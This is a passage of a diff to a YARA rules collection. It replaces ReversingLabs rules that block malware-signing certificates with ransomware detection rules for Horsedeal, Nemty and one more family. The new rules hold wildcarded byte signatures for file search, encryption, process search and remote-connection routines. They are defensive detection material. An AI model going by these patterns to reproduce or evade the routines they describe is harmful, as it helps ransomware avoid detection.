?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 + C4 ?? 2B D3 8B CB 89 95 ?? ?? ?? ?? 0F B7 01 66 89 04 0A 8D 49 ?? 66 85 C0 75 ?? 8D + BD ?? ?? ?? ?? 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C6 75 ?? BE ?? ?? ?? ?? 68 ?? ?? + ?? ?? 53 A5 A5 66 A5 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF + 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 33 F6 8B 1D ?? ?? ?? ?? + 83 FB ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? + 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 8B C6 + EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B + 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 + 85 D2 75 ?? 8B C6 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B + 95 ?? ?? ?? ?? 0F B7 01 66 89 04 0A 8D 49 ?? 66 85 C0 75 ?? 8D BD ?? ?? ?? ?? 83 EF + ?? 33 C9 66 8B 47 ?? 8D 7F ?? 66 3B C1 75 ?? A1 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 89 07 + 8B F2 66 8B 02 83 C2 ?? 66 3B C1 75 ?? 8D BD ?? ?? ?? ?? 2B D6 83 EF ?? 66 8B 47 ?? + 83 C7 ?? 66 3B C1 75 ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F6 85 ?? ?? ?? ?? ?? F3 + A4 74 ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? F7 85 ?? ?? ?? ?? + ?? ?? ?? ?? 75 ?? 8B 8D ?? ?? ?? ?? 66 8B 85 ?? ?? ?? ?? 66 89 04 59 43 89 1D ?? ?? + ?? ?? 33 F6 8B 9D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 + ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $find_special_folders = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 BE ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 56 33 DB 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 56 53 50 E8 + ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 56 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? + ?? ?? BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 6A ?? 59 68 ?? ?? ?? ?? 53 F3 A5 50 E8 ?? ?? + ?? ?? 83 C4 ?? 8D BD ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 59 F3 A5 68 + ?? ?? ?? ?? 53 50 66 A5 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D + BD ?? ?? ?? ?? 6A ?? 59 68 ?? ?? ?? ?? 53 F3 A5 50 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? 83 C4 ?? 53 6A ?? 50 53 FF D6 53 6A ?? 8D 85 ?? ?? ?? ?? 50 53 FF + D6 53 6A ?? 8D 85 ?? ?? ?? ?? 50 53 FF D6 8D BD ?? ?? ?? ?? 83 EF ?? 66 8B 47 ?? 83 + C7 ?? 66 3B C3 75 ?? 6A ?? 59 BE ?? ?? ?? ?? F3 A5 8D BD ?? ?? ?? ?? 83 EF ?? 66 8B + 47 ?? 83 C7 ?? 66 3B C3 75 ?? 6A ?? 59 BE ?? ?? ?? ?? F3 A5 8D BD ?? ?? ?? ?? 83 EF + ?? 66 8B 47 ?? 83 C7 ?? 66 3B C3 75 ?? BE ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? A5 A5 A5 A5 + 66 A5 E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? + ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B + 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $remote_connection = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 89 85 ?? + ?? ?? ?? 33 DB 8B 45 ?? 8B FA 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 + 50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? A0 ?? ?? ?? ?? 88 45 ?? 8D 85 ?? + ?? ?? ?? 53 53 53 53 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? + 85 DB 74 ?? 33 C0 50 50 6A ?? 50 50 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 8B F8 85 + FF 74 ?? 33 C0 50 68 ?? ?? ?? ?? 50 50 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ?? 50 + 57 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 8B 95 ?? ?? ?? ?? 33 C9 85 D2 74 ?? 8B CA 8D + 41 ?? 89 85 ?? ?? ?? ?? 8A 01 41 84 C0 75 ?? 2B 8D ?? ?? ?? ?? 51 52 6A ?? 6A ?? 53 + FF 15 ?? ?? ?? ?? 53 FF D6 8B 9D ?? ?? ?? ?? 57 FF D6 53 FF D6 8B 4D ?? 5F 5E 33 CD + 5B E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $encrypt_files_1 = { + 55 8B EC 51 51 83 4D ?? ?? 83 4D ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 + ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ?? 6A ?? 58 EB ?? 56 8D 45 ?? 50 + 57 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 75 ?? 6A ?? EB ?? 8B 75 ?? 3B C6 0F 42 F0 83 7D + ?? ?? 74 ?? 6A ?? 8D 45 ?? 50 56 FF 75 ?? 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? 5E + 57 FF 15 ?? ?? ?? ?? EB ?? 57 FF 15 ?? ?? ?? ?? 3B 75 ?? 6A ?? 58 0F 45 F0 8B C6 EB + ?? 57 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5E 5F 8B E5 5D C2 + } + $encrypt_files_2_p1 = { + 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? + ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 45 ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? + 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? + ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? 50 89 85 ?? ?? + ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 59 33 C0 8D 7D ?? + F3 AB 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 85 C0 74 ?? FF 15 ?? ?? ?? ?? 50 + 68 ?? ?? ?? ?? 83 CE ?? EB ?? 6A ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 85 + C0 74 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 5E 6A ?? 8B D6 59 E8 ?? ?? ?? ?? + 59 59 E9 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 85 F6 75 ?? 6A ?? 5E E9 ?? ?? ?? ?? 80 BD ?? + ?? ?? ?? ?? B8 ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? 3B F0 0F 47 F0 8D 85 ?? ?? ?? ?? 50 + 56 8B C8 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 FF B5 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? + ?? 8B F8 85 FF 79 ?? FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? 5A 6A ?? 59 E8 ?? ?? ?? + ?? 59 59 BE ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? + FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 5A 6A ?? 59 E8 ?? ?? ?? ?? 59 59 6A ?? E9 + ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 8D 55 ?? 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C7 8B DF 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 74 ?? 8B + } + $encrypt_files_2_p2 = { + B5 ?? ?? ?? ?? 43 46 8B C3 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 75 ?? 89 B5 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? 50 53 8B C8 E8 ?? ?? ?? ?? 33 D2 85 FF 7E ?? 8B 85 ?? ?? ?? ?? + 8A 0C 10 8B 85 ?? ?? ?? ?? 88 0C 10 42 3B D7 7C ?? 3B FB 7D ?? 8B C3 2B C7 50 8B 85 + ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 03 C7 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 + 53 8B C8 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8B + 95 ?? ?? ?? ?? 8D 45 ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 + ?? 6A ?? E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 59 59 85 C0 75 ?? 6A ?? 33 FF 5A 8B 85 ?? ?? ?? ?? 8A 4C 3D ?? 88 0C 38 + 47 3B FA 7C ?? 8D 75 ?? 6A ?? 2B F2 5F 8B 85 ?? ?? ?? ?? 8A 0C 32 88 0C 10 42 3B D7 + 7C ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 83 EC ?? 8D + 85 ?? ?? ?? ?? 50 51 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 + } + $encrypt_files_2_p3 = { + 85 C0 79 ?? 6A ?? E9 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? BA ?? ?? ?? ?? 2B F7 8B 85 ?? ?? + ?? ?? 8A 0C 37 88 0C 38 47 3B FA 7C ?? 8B B5 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8A 8C 02 ?? + ?? ?? ?? 8B 85 ?? ?? ?? ?? 88 0C 10 42 81 FA ?? ?? ?? ?? 7C ?? 83 BD ?? ?? ?? ?? ?? + 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 75 ?? BE ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B C6 E9 ?? ?? ?? ?? 51 6A ?? 53 FF B5 ?? ?? ?? ?? 8D 4D ?? E8 + ?? ?? ?? ?? 8B F8 85 FF 79 ?? FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? 5A 6A ?? 59 E8 + ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 87 ?? ?? ?? ?? + E9 ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B + F8 85 FF 79 ?? FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? 5A 6A ?? 59 E8 ?? ?? ?? ?? 59 + 59 EB ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 01 34 85 + ?? ?? ?? ?? FF 04 85 ?? ?? ?? ?? 33 FF 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8B C7 E8 ?? ?? ?? ?? C3 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, William Zoltan" and pe.signatures[i].serial=="2f:da:dd:07:40:57:22:70:20:3f:81:38:69:2c:4a:83" and 1404172799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($find_special_folders) and ($encrypt_files_1) and ( all of ($encrypt_files_2_p*)) and ($remote_connection) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_4Fc13D6220C629043A26F81B1Cad72D8 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Horsedeal : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Horsedeal ransomware." author = "ReversingLabs" - id = "c2573adc-6580-58aa-a58c-c21bf6b79364" - date = "2023-11-08" - modified = "2023-11-08" + id = "c722bc5b-756e-5d46-8530-e20ebb73737c" + date = "2020-10-01" + modified = "2020-10-01" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1618-L1634" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5572c278f6c9be62b2bba09ea610fd170438c6893ee5283ff4a5b3bb2852b07b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Horsedeal.yara#L1-L106" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fa8c425b08606399b5dc7673f3898e3dba7efb6a62e56db8f500cf5072bb590b" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Horsedeal" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, meicun ge" and pe.signatures[i].serial=="4f:c1:3d:62:20:c6:29:04:3a:26:f8:1b:1c:ad:72:d8" and 1404172799<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_3457A918C6D3701B2Eaca6A92474A7Cc : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "12526715-7b54-5c31-aa2a-b77ed067e3ee" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1636-L1652" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "70d4bece52a86bfe8958f6d4195b833cea609596e3b68bb90087c262501bd462" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $search_processes = { + 55 8B EC 81 EC ?? ?? ?? ?? 56 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 8D + 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 + FF 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF B5 ?? ?? ?? + ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 74 ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 53 FF + 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5B 56 FF 15 ?? + ?? ?? ?? 5E C9 C3 + } + $enum_resources = { + 55 8B EC 83 E4 ?? 83 EC ?? 83 0C 24 ?? 8D 44 24 ?? 53 56 57 50 FF 75 ?? C7 44 24 ?? + ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4C 24 ?? E8 ?? ?? ?? + ?? 8B F0 85 F6 74 ?? EB ?? 33 DB 39 5C 24 ?? 76 ?? 8D 7E ?? F6 47 ?? ?? 74 ?? 8D 47 + ?? 50 E8 ?? ?? ?? ?? EB ?? FF 37 E8 ?? ?? ?? ?? 43 83 C7 ?? 59 3B 5C 24 ?? 72 ?? 8D + 44 24 ?? 50 56 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B CE E8 ?? + ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 + } + $find_files = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 53 56 8B 35 ?? ?? ?? ?? 57 + 8B 7D ?? 74 ?? 68 ?? ?? ?? ?? 57 FF D6 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? + ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? + ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? + 8D 44 24 ?? 50 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 83 + C4 ?? A8 ?? 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D + 44 24 ?? 50 FF D6 85 C0 74 ?? 53 E8 ?? ?? ?? ?? 59 EB ?? 8B 44 24 ?? A8 ?? 74 ?? 68 + ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? + 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 8B CB E8 ?? ?? + ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 + ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? + ?? ?? 83 C4 ?? 33 FF 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? + ?? ?? 8B F0 89 74 24 ?? 83 FE ?? 74 ?? 57 8B 3D ?? ?? ?? ?? 8D 44 24 ?? 50 68 ?? ?? + ?? ?? FF D7 50 68 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 6A ?? 8D 44 24 ?? 50 FF 35 + ?? ?? ?? ?? FF D7 8B 7C 24 ?? 50 FF 35 ?? ?? ?? ?? 57 FF D6 57 FF 15 ?? ?? ?? ?? 8B + CB E8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 + } + $encrypt_files_p1 = { + 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 8B 35 ?? ?? ?? ?? 57 FF 35 ?? ?? ?? ?? + 8B F9 89 7D ?? FF D6 FF 35 ?? ?? ?? ?? 8B D8 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 FF + D6 3B C3 0F 84 ?? ?? ?? ?? 6A ?? 59 33 DB 89 4D ?? 8B C3 88 9C 05 ?? ?? ?? ?? 40 3D + ?? ?? ?? ?? 72 ?? 8D 85 ?? ?? ?? ?? 50 51 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 + 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 89 45 ?? 8A 84 0D ?? ?? ?? ?? 88 44 0D ?? + 41 83 F9 ?? 72 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 53 6A ?? 53 FF 35 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 6A ?? 58 50 53 6A ?? 68 ?? ?? ?? ?? + 57 89 45 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 83 65 ?? ?? 57 FF D6 + 8D 0C 47 83 E9 ?? 66 83 39 ?? 75 ?? FF 35 ?? ?? ?? ?? 2B CF 83 C1 ?? D1 F9 8D 04 4F + 50 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF 35 ?? ?? ?? ?? FF D6 FF 75 ?? 8B F0 FF + 15 ?? ?? ?? ?? 3B C6 75 ?? 33 F6 46 EB ?? 8B 75 ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? + 8B 4D ?? 8B 45 ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 77 ?? 33 F6 46 85 F6 74 ?? 8B 35 + ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 + } + $encrypt_files_p2 = { + 53 FF 15 ?? ?? ?? ?? 6A ?? FF 75 ?? 8D 55 ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 99 6A ?? 6A ?? 52 50 53 FF D7 6A ?? 8D 45 ?? 50 FF + 75 ?? 8D 85 ?? ?? ?? ?? 50 53 FF D6 81 7D ?? ?? ?? ?? ?? 74 ?? E9 ?? ?? ?? ?? 6A ?? + 6A ?? 51 0F 57 C0 50 66 0F 13 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? 2D ?? ?? ?? ?? 8B 35 ?? + ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 DA ?? 89 45 ?? 8B 45 ?? 2D ?? ?? ?? ?? 89 55 ?? 89 45 + ?? 8D 45 ?? 83 D9 ?? 89 45 ?? 89 4D ?? 6A ?? 6A ?? FF 70 ?? FF 30 53 FF D7 6A ?? 8D + 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 6A ?? FF 75 ?? 8D + 55 ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 99 6A + ?? 6A ?? 52 50 53 FF D7 6A ?? 8D 45 ?? 50 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 53 FF D6 8B + 45 ?? 83 C0 ?? 83 6D ?? ?? 89 45 ?? 75 ?? 8B 7D ?? 0F 57 C0 6A ?? 6A ?? 66 0F 13 45 + ?? FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A + ?? 8D 45 ?? 50 53 FF D6 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF + D6 53 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ?? + ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 57 FF 15 ?? ?? + ?? ?? 8B CE E8 ?? ?? ?? ?? 5F 5E 5B C9 C3 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "KONSALTING PLUS OOO" and pe.signatures[i].serial=="34:57:a9:18:c6:d3:70:1b:2e:ac:a6:a9:24:74:a7:cc" and 1432252799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($enum_resources) and ($search_processes) and ($find_files) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_621Ed8265B0Ad872D9F4B4Ed6D560513 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Nemty : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Nemty ransomware." author = "ReversingLabs" - id = "b64e640c-264f-597c-90a5-d0ad57aa5075" - date = "2023-11-08" - modified = "2023-11-08" + id = "c56ecd32-5903-5bcc-aa69-a070f2c247c4" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1654-L1670" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c133d6eea5d27e597d0a656c7c930a5ca84adb46aa2fec66381b6b5c759e22aa" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Nemty.yara#L1-L205" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "dc8cfdcdea8ecb2018b1b04bb1b645f6dbdc6c07357719100677c75945edef40" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Nemty" + tc_detection_factor = 5 importance = 25 + strings: + $remote_connection_p1 = { + 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 